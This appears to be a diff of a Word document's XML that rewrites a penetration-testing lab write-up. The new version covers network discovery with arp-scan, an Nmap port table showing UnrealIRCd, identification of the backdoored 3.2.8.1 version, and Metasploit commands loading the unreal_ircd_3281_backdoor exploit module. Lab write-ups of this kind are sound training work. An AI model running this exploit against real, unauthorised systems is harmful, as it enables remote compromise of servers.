-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>-scan -l</w:t>
+        <w:t>sudo arp-scan -l</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5514,27 +5484,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>This scan identified the target machine.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Target IP discovered:</w:t>
+        <w:t>Target identified:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5598,10 +5548,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45380065" wp14:editId="2CC7A02F">
-            <wp:extent cx="5731510" cy="2487930"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
-            <wp:docPr id="1690907709" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8EDE6E" wp14:editId="38EBD412">
+            <wp:extent cx="5731510" cy="2448560"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
+            <wp:docPr id="1423592019" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5609,7 +5559,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1690907709" name=""/>
+                    <pic:cNvPr id="1423592019" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5621,7 +5571,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2487930"/>
+                      <a:ext cx="5731510" cy="2448560"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5633,6 +5583,15 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5648,46 +5607,29 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:t xml:space="preserve">Step 2 — </w:t>
       </w:r>
       <w:r>
@@ -5696,33 +5638,13 @@
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>Port Scanning</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>After discovering the target IP, an Nmap scan was performed to identify open ports and services.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5819,6 +5741,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Open Ports Identified</w:t>
       </w:r>
     </w:p>
@@ -5843,9 +5766,9 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="549"/>
+        <w:gridCol w:w="575"/>
         <w:gridCol w:w="827"/>
-        <w:gridCol w:w="1656"/>
+        <w:gridCol w:w="1376"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -5976,7 +5899,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>6667</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6003,7 +5926,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>FTP</w:t>
+              <w:t>IRC</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6018,6 +5941,8 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -6026,11 +5951,13 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>pyftpdlib 1.5.5</w:t>
+              <w:t>UnrealIRCd</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6062,7 +5989,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>6697</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6089,7 +6016,70 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>SSH</w:t>
+              <w:t>IRC</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>UnrealIRCd</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>8067</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6116,7 +6106,38 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>OpenSSH 7.9p1</w:t>
+              <w:t>IRC</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>UnrealIRCd</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6139,7 +6160,27 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>These services provided potential entry points into the system.</w:t>
+        <w:t xml:space="preserve">This indicates the system is running an </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>IRC service</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, which is often a target for known exploits.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6157,10 +6198,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13408BA0" wp14:editId="695E1B45">
-            <wp:extent cx="5731510" cy="4283075"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
-            <wp:docPr id="704402100" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17F983ED" wp14:editId="49A19039">
+            <wp:extent cx="5731510" cy="1343025"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
+            <wp:docPr id="1374293567" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6168,7 +6209,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="704402100" name=""/>
+                    <pic:cNvPr id="1374293567" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6180,7 +6221,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="4283075"/>
+                      <a:ext cx="5731510" cy="1343025"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6220,11 +6261,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -6236,8 +6273,155 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:t>Vulnerability Analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>During research, the IRC service was identified as:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>UnrealIRCd 3.2.8.1 (Backdoored version)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>This version contains a known backdoor vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095DCDBF" wp14:editId="61F1A158">
+            <wp:extent cx="5731510" cy="2773045"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
+            <wp:docPr id="1445031701" name="Picture 32"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1445031701" name="Picture 1445031701"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2773045"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -6249,16 +6433,35 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>FTP Enumeration</w:t>
+        <w:t>Exploitation Phase</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -6266,11 +6469,16 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The FTP service was tested to check whether anonymous login was allowed.</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Using Metasploit</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6290,7 +6498,27 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Command:</w:t>
+        <w:t>Metasploit was used to exploit the backdoor vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Commands:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6336,7 +6564,21 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ftp 172.20.10.2</w:t>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6352,32 +6594,15 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Anonymous login was successful.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A7F50B" wp14:editId="725997B5">
-            <wp:extent cx="5731510" cy="3001645"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
-            <wp:docPr id="234193362" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DE3A099" wp14:editId="506586CF">
